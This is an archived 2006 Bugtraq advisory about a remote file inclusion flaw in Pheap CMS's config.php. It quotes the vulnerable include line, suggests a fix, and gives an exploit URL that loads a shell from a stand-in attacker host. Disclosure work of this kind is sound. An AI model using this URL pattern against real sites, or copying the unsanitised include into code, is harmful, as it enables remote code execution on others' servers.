| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 30 Aug 2006 19:29:58 -0000 From: SHiKaA-@...mail.com To: bugtraq@...urityfocus.com Subject: Pheap CMS<= (lpref) Remote File Inclusion Exploit #============================================================================================== #Pheap CMS<= (lpref) Remote File Inclusion Exploit #=============================================================================================== # #Critical Level : Dangerous # #Venedor site : http://pheap.barekoncept.com/ # # #================================================================================================ #Bug in : pheap/lib/config.php # #Vlu Code : #-------------------------------- # <? # # include($lpref."lib/globals.php"); # #================================================================================================ # #Solution : # # Insert in config.php $lpref = "pheap"; # soory guys ... u willn't find any variable sites coz the scripts very new ;) # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/pheap/lib/config.php?lpref=http://SHELLURL.COM? # #================================================================================================ #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@...B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior ==================================================================================================
Powered by blists - more mailing lists